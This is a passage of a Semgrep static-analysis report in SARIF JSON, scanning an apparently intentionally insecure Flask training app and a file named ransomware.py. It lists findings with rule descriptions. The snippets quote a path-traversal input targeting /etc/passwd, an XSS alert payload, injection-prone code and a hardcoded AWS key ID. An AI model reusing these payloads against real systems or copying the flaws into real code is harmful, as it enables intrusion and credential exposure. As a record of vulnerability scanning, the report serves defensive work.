option."},"properties":{},"ruleId":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query"},{"fingerprints":{"matchBasedId/v1":"b87c2d8593c7152570c61e23f58ee1c3c14f49e101e57758dfa1afe887301dd76d3f113bd714fda7d91b80555d8de9269a8c3abd99a0f1dd6008d6cfdf2a4ca3_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":37,"endLine":91,"snippet":{"text":" cursor.execute(query)"},"startColumn":32,"startLine":91}}}],"message":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value."},"properties":{},"ruleId":"python.flask.db.generic-sql-flask.generic-sql-flask"},{"fingerprints":{"matchBasedId/v1":"13ce855503a2b37f3f9c112fcb3d0ac9143b888470dbce27320483e6fd1b1b8a998e062969b709e11f8179af0ec24b93ddaf8cbafcb397bfa9811dc811b83464_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":24,"endLine":165,"snippet":{"text":" return render_template_string(\"\"\"\n

Intentionally Insecure App

\n
\n\n \n
\n

Command Injection

\n \n \n
\n
\n\n \n
\n

Path Traversal via File Upload

\n \n \n
\n

Try uploading a file named: ../../../../etc/passwd

\n
\n\n \n
\n

SQL Injection

\n \n \n
\n
\n\n \n
\n Enter XSS payload: alert('XSS');\">\n \n
\n
\n\n \n
\n

XML External Entity (XXE) Injection

\n \n \n
\n
\n\n \n
\n

Server-Side Request Forgery (SSRF)

\n \n \n
\n
\n \n

SQL Injection 2

\n
\n Enter Username: \n \n
\n
\n 
{{ output|safe }}
\n \"\"\", output=output)"},"startColumn":12,"startLine":100}}}],"message":{"text":"Found a template created with string formatting. This is susceptible to server-side template injection and cross-site scripting attacks."},"properties":{},"ruleId":"python.flask.security.audit.render-template-string.render-template-string"},{"fingerprints":{"matchBasedId/v1":"6dae0772a1b32440b458d87e0cca51340604bd76de0ea5deca5133d9027cb436aabd95df2e5db8e61b40332dd0d4c67e8bca5719388acbb5b5a4e167facf2bb2_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":51,"endLine":168,"snippet":{"text":" app.run(host='0.0.0.0', port=8080, debug=True)"},"startColumn":5,"startLine":168}}}],"message":{"text":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment."},"properties":{},"ruleId":"python.flask.debug.debug-flask.active-debug-code-flask"},{"fingerprints":{"matchBasedId/v1":"271820bbd48a853d5bce2f172f42d3f041c92b4c28efcf09d988ca43a235d86456e7b2ee54998b6ce7c65e81cae15dfd9c07ab728e527d442b48b1bc2a680e52_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":51,"endLine":168,"snippet":{"text":" app.run(host='0.0.0.0', port=8080, debug=True)"},"startColumn":5,"startLine":168}}}],"message":{"text":"Running flask app with host 0.0.0.0 could expose the server publicly."},"properties":{},"ruleId":"python.flask.security.audit.app-run-param-config.avoid_app_run_with_bad_host"},{"fingerprints":{"matchBasedId/v1":"2815cac7767db0f179d0d732747d5db89a1f1b11f9dd2966492a2764245edef355b56328bcdcf199fd5d4bbd16ced4243722a364f9be3708447ba8d6288b3fde_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":51,"endLine":168,"snippet":{"text":" app.run(host='0.0.0.0', port=8080, debug=True)"},"startColumn":5,"startLine":168}}}],"message":{"text":"Detected Flask app with debug=True. Do not deploy to production with this flag enabled as it will leak sensitive information. Instead, consider using Flask configuration variables or setting 'debug' using system environment variables."},"properties":{},"ruleId":"python.flask.security.audit.debug-enabled.debug-enabled"},{"fingerprints":{"matchBasedId/v1":"0bb3d92a97de4d8e7957e2f0b9737acfdd7f1e086dff8dee7be6fe2434bb8edcd20e0833137f79f73b6cd52ffff9d217bd818dc534b30fba4dc0024a8d29b5f1_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"ransomware.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":36,"endLine":34,"snippet":{"text":" aws = \"AKIA2JAPX77RGLB664VE\""},"startColumn":16,"startLine":34}}}],"message":{"text":"AWS Access Key ID Value detected. This is a sensitive credential and should not be hardcoded here. Instead, read this value from an environment variable or keep it in a separate, private file."},"properties":{},"ruleId":"generic.secrets.security.detected-aws-access-key-id-value.detected-aws-access-key-id-value"},{"fingerprints":{"matchBasedId/v1":"270dede60d47d0cb37166fcb71470c8044447deec017049b86d8bbb04f6ea87b6e53a2ebfc0c71814e87165b6e2474d3406f6a01f3ac4b28cd13462adbb06d2f_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"ransomware.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":51,"endLine":143,"snippet":{"text":" urllib.request.urlretrieve(imageUrl, path)"},"startColumn":9,"startLine":143}}}],"message":{"text":"Detected a dynamic value being used with urllib. urllib supports 'file://' schemes, so a dynamic value controlled by a malicious actor may allow them to read arbitrary files. Audit uses of urllib calls to ensure user data cannot control the URLs, or consider using the 'requests' library instead."},"properties":{},"ruleId":"python.lang.security.audit.dynamic-urllib-use-detected.dynamic-urllib-use-detected"},{"fingerprints":{"matchBasedId/v1":"00585b3a7d2593710ee2218c2411dd1ede392cc623bf48f5263a4da843f083beb9233844eb4acea77dbbf056304cba26d19382785d99d61b9e152a7075432c69_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"snyk.sarif","uriBaseId":"%SRCROOT%"},"region":{"endColumn":77,"endLine":1370,"snippet":{"text":" \"line\": \"secret = '54efcbaed7f64673bc93b4e28ca9e8b2'\\n\","},"startColumn":34,"startLine":1370}}}],"message":{"text":"Generic Secret detected"},"properties":{},"ruleId":"generic.secrets.security.detected-generic-secret.detected-generic-secret"}],"tool":{"driver":{"name":"Semgrep OSS","rules":[{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","id":"swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","name":"swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name)."},"help":{"markdown":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.ssrf.web-request.ssrf)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.ssrf.web-request.ssrf","id":"csharp.lang.security.ssrf.web-request.ssrf","name":"csharp.lang.security.ssrf.web-request.ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.ssrf.web-request.ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","id":"swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","name":"swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false."},"help":{"markdown":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n","text":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","id":"java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","name":"java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher."},"help":{"markdown":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size)\n - [https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/](https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/)\n - [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57Pt3r1.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57Pt3r1.pdf)\n","text":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher."},"helpUri":"https://semgrep.dev/r/python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","id":"python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","name":"python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path."},"help":{"markdown":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.alias-path-traversal.alias-path-traversal)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)\n - [https://www.youtube.com/watch?v=CIhHpkybYsY](https://www.youtube.com/watch?v=CIhHpkybYsY)\n - [https://github.com/orangetw/My-Presentation-Slides/blob/main/data/2018-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out.pdf](https://github.com/orangetw/My-Presentation-Slides/blob/main/data/2018-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out.pdf)\n","text":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.alias-path-traversal.alias-path-traversal","id":"generic.nginx.security.alias-path-traversal.alias-path-traversal","name":"generic.nginx.security.alias-path-traversal.alias-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.alias-path-traversal.alias-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details)."},"help":{"markdown":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pymongo.security.mongodb.mongo-client-bad-auth)\n - [https://cwe.mitre.org/data/definitions/477.html](https://cwe.mitre.org/data/definitions/477.html)\n","text":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details)."},"helpUri":"https://semgrep.dev/r/python.pymongo.security.mongodb.mongo-client-bad-auth","id":"python.pymongo.security.mongodb.mongo-client-bad-auth","name":"python.pymongo.security.mongodb.mongo-client-bad-auth","properties":{"precision":"very-high","tags":["CWE-477: Use of Obsolete Function","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.pymongo.security.mongodb.mongo-client-bad-auth"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host)\n - [https://goteleport.com/blog/ssrf-attacks/](https://goteleport.com/blog/ssrf-attacks/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","id":"go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","name":"go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","id":"java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","name":"java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead."},"help":{"markdown":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command)\n - [http://docs.paramiko.org/en/stable/api/client.html#paramiko.client.SSHClient.exec_command](http://docs.paramiko.org/en/stable/api/client.html#paramiko.client.SSHClient.exec_command)\n - [https://github.com/PyCQA/bandit/blob/d5f8fa0d89d7b11442fc6ec80ca42953974354c8/bandit/plugins/injection_paramiko.py](https://github.com/PyCQA/bandit/blob/d5f8fa0d89d7b11442fc6ec80ca42953974354c8/bandit/plugins/injection_paramiko.py)\n","text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","id":"python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","name":"python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/www-community/HttpOnly](https://owasp.org/www-community/HttpOnly)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","id":"java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","name":"java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text."},"help":{"markdown":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text)\n - [https://brakemanpro.com/2017/09/08/cross-site-scripting-in-rails#inline-renders---even-worse-than-xss](https://brakemanpro.com/2017/09/08/cross-site-scripting-in-rails#inline-renders---even-worse-than-xss)\n","text":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","id":"ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","name":"ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, 